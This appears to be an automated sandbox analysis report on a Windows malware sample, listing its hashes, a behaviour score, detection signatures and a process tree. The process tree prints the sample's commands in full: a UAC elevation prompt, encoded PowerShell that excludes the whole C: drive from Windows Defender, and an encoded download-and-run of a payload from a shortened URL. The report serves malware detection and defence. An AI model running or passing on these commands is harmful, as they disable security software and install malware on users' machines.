Analysis

  • max time kernel
    119s
  • max time network
    120s
  • platform
    windows7_x64
  • resource
    win7-20240903-en
  • resource tags
    arch:x64, arch:x86, image:win7-20240903-en, locale:en-us, os:windows7-x64, system
  • submitted
    30/03/2025, 12:12

General

  • Target

    reversheshellb64batTO.exe

  • Size

    88KB

  • MD5

    aa8d4f9a7cea9c7c8de61478ae5a7f81

  • SHA1

    5b8ce5f94b702731877e55822dfb505af4332fa6

  • SHA256

    cb89e6fafecf411a75df6cb06b2302e8f3c9696232dbdff6b25b3d6bec635c91

  • SHA512

    2f54a16ad0a7a0ec8c6ea4f08cd28c587a6ac29421ec1433150e80e164d48bdd312480a86b15477deee4e11f3cf331823400a9fc858451fc4eaf59213577c982

  • SSDEEP

    1536:D7fPGykbOqjoHm4pICdfkLtAfupcWX50MxFY+yIOlnToIf3xP+:fq6+ouCpk2mpcWJ0r+QNTBf3B+

Score
10/10

Malware Config

Extracted

  • Language
    ps1
  • Deobfuscated URLs
    exe.dropper: https://tinyurl.com/VIRGPLOAD

Signatures

  • Command and Scripting Interpreter: PowerShell 1 TTPs 4 IoCs

    Start PowerShell.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 2 IoCs

    Attempts to gather information about the system language of a victim in order to infer the geographical location of that host.

  • Suspicious behavior: EnumeratesProcesses 9 IoCs
  • Suspicious use of AdjustPrivilegeToken 7 IoCs
  • Suspicious use of WriteProcessMemory 36 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\reversheshellb64batTO.exe
    "C:\Users\Admin\AppData\Local\Temp\reversheshellb64batTO.exe"
    1⤵
    • System Location Discovery: System Language Discovery
    • Suspicious use of WriteProcessMemory
    PID:2084
    • C:\Windows\system32\cmd.exe
      "C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\8749.tmp\874A.tmp\874B.bat C:\Users\Admin\AppData\Local\Temp\reversheshellb64batTO.exe"
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:1644
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        powershell -w h -command ""
        3⤵
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:2524
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        powershell -Command "Start-Process -Verb RunAs -FilePath 'C:\Users\Admin\AppData\Local\Temp\reversheshellb64batTO.exe' -ArgumentList 'am_admin'"
        3⤵
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:2340
        • C:\Users\Admin\AppData\Local\Temp\reversheshellb64batTO.exe
          "C:\Users\Admin\AppData\Local\Temp\reversheshellb64batTO.exe" am_admin
          4⤵
          • System Location Discovery: System Language Discovery
          • Suspicious use of WriteProcessMemory
          PID:2828
          • C:\Windows\system32\cmd.exe
            "C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\8C77.tmp\8C78.tmp\8C79.bat C:\Users\Admin\AppData\Local\Temp\reversheshellb64batTO.exe am_admin"
            5⤵
            • Suspicious use of WriteProcessMemory
            PID:2860
            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              powershell -w h -command ""
              6⤵
              • Command and Scripting Interpreter: PowerShell
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              PID:1824
            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              powershell -enc cABvAHcAZQByAHMAaABlAGwAbAAuAGUAeABlACAALQBjAG8AbQBtAGEAbgBkACAAIgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAIgBDADoAXAANAAoA
              6⤵
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              • Suspicious use of WriteProcessMemory
              PID:2824
              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "Add-MpPreference -ExclusionPath " C:\
                7⤵
                • Command and Scripting Interpreter: PowerShell
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious use of AdjustPrivilegeToken
                PID:2772
            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              powershell -enc cgBlAGcAIABhAGQAZAAgACIASABLAEwATQBcAFMATwBGAFQAVwBBAFIARQBcAFAAbwBsAGkAYwBpAGUAcwBcAE0AaQBjAHIAbwBzAG8AZgB0AFwAVwBpAG4AZABvAHcAcwAgAEQAZQBmAGUAbgBkAGUAcgBcAEUAeABjAGwAdQBzAGkAbwBuAHMAXABQAGEAdABoAHMAIgAgAC8AdgAgAEMAOgBcAA==
              6⤵
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              • Suspicious use of WriteProcessMemory
              PID:492
              • C:\Windows\system32\reg.exe
                "C:\Windows\system32\reg.exe" add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /v C:\
                7⤵
                PID:324
              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                powershell -enc JAB1AHIAbAAgAD0AIAAiAGgAdAB0AHAAcwA6AC8ALwB0AGkAbgB5AHUAcgBsAC4AYwBvAG0ALwBWAEkAUgBHAFAATABPAEEARAAiAA0ACgAkAG8AdQB0AHAAdQB0ACAAPQAgACIAJABlAG4AdgA6AFQAZQBtAHAALwBSAHUAbgB0AGkAbQBlAEIAcgBvAGsAZQByAC4AZQB4AGUAIgANAAoASQBuAHYAbwBrAGUALQBXAGUAYgBSAGUAcQB1AGUAcwB0ACAALQBVAHIAaQAgACQAdQByAGwAIAAtAE8AdQB0AEYAaQBsAGUAIAAkAG8AdQB0AHAAdQB0AA0ACgBTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAALQBGAGkAbABlAFAAYQB0AGgAIAAkAG8AdQB0AHAAdQB0AA==
                6⤵
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious use of AdjustPrivilegeToken
                PID:584

Network

MITRE ATT&CK Enterprise v15

Downloads

    • C:\Users\Admin\AppData\Local\Temp\8749.tmp\874A.tmp\874B.bat

      Filesize

      1KB

      MD5

      67ce8577d16577bede59e604f52ec2de

      SHA1

      c0a7b9d0f0082d227a2e9ae125c09afa08b30ec6

      SHA256

      1cf31abdbb120a1449dd41cbdcf6a183f136dfb525c255c9a5793df5c5a84ba6

      SHA512

      a2491767e88064922bfc42740ec983b04097339cac9fdb93e11cc1fd6344ad52a4bb1cadb3a0a7e11578d84b4ce4da85b04388ba72c620b425a824d70e2fcd3e

    • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

      Filesize

      7KB

      MD5

      fee04de97614d6d228a0e3a16f726557

      SHA1

      226305dff59bb7a4befc40bbd053fe4a0ebb105b

      SHA256

      5203d258efcdde6d13c6db072bbc5cc9bebb67d7be365b865779e4ba57172f8c

      SHA512

      c550e203866793078dd74ea084758164d5ca308985733db5233f0a6015fb091cb6a1cb5767cd16d440a8c8904289e856bf060b0fc63697e80be2ed12c6dfcb3b

    • memory/2340-16-0x000000001B660000-0x000000001B942000-memory.dmp

      Filesize

      2.9MB

    • memory/2340-17-0x0000000001D20000-0x0000000001D28000-memory.dmp

      Filesize

      32KB

    • memory/2524-6-0x000007FEF555E000-0x000007FEF555F000-memory.dmp

      Filesize

      4KB

    • memory/2524-7-0x000000001B7F0000-0x000000001BAD2000-memory.dmp

      Filesize

      2.9MB

    • memory/2524-8-0x0000000001D90000-0x0000000001D98000-memory.dmp

      Filesize

      32KB

    • memory/2524-9-0x0000000002F64000-0x0000000002F67000-memory.dmp

      Filesize

      12KB

    • memory/2524-10-0x000007FEF52A0000-0x000007FEF5C3D000-memory.dmp

      Filesize

      9.6MB